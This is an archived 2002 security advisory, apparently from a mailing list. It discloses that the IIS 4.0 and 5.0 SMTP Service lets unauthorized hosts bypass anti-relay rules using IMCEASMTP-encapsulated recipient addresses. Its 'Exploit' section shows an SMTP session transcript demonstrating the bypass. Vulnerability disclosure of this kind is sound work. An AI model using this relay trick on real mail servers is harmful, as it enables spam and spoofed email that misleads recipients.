Portcullis Security Advisory IIS Microsoft SMTP Service Encapsulated SMTP Address Vulnerability Update to Microsoft Security Bulletin (MS99-027): NT Exchange Server Encapsulated SMTP Address Vulnerability. Vulnerability discovery and development: Thomas Liam Romanis (Security Testing Services Manager) Geoff M Webb (Technical Manager) James R Turner (Senior Technical Engineer) Affected systems: IIS 4.0 Microsoft SMTP Service IIS 5.0 Microsoft SMTP Service IIS 5.1 Microsoft SMTP Service not tested yet. Details: Laurent Frinking of Quark Deutschland GmbH originally discovered this vulnerability. At that time the discovery concerned all versions of Microsoft Exchange 5.5 prior to SP2 with the SP2 IMC patch. Portcullis have discovered that the Microsoft SMTP Service available with IIS 4.0 and IIS 5.0 is also vulnerable to the encapsulated SMTP address vulnerability even with anti-relaying features enabled. This vulnerability allows hosts that are not authorized to relay e-mail via the SMTP server to bypass the anti-relay features and send mail to foreign domains. Impact: The anti-relay rules will be circumvented allowing spam and spoofed mail to be relayed via the SMTP mail server. Spam Mail: If the Microsoft IIS SMTP Server is used to relay spam mail this could result in the mail server being black holed causing disruption to the service. Spoofed e-mail: As the Microsoft IIS SMTP Service is most often utilised in conjunction with IIS for commercial use this flaw could be used in order to engineer customers particularly because spoofed e-mail relayed in this way will show the trusted web server in the SMTP header. Exploit: 220 test-mailer Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 ready at Tue, 28 May 2002 14:54:10 +0100 helo 250 test-mailer Hello [IP address of source host] MAIL FROM: testat_private 250 2.1.0 testat_private OK RCPT TO: test2at_private 550 5.7.1 Unable to relay for testat_private RCPT TO: IMCEASMTP-test+40test+2Ecomat_private 250 2.1.5 IMCEASMTP-test+40test+2Ecomat_private data 354 Start mail input; end with <CRLF>.<CRLF> Subject: You are vulnerable. Copyright © Portcullis Computer Security Limited 2002, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. Disclaimer: The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. John Clayton Portcullis Computer Security Ltd. Security Testing Services Team Leader and Dragon IDS Technical Product Manager www.portcullis-security.com
This archive was generated by hypermail 2b30 : Fri Jul 12 2002 - 17:55:10 PDT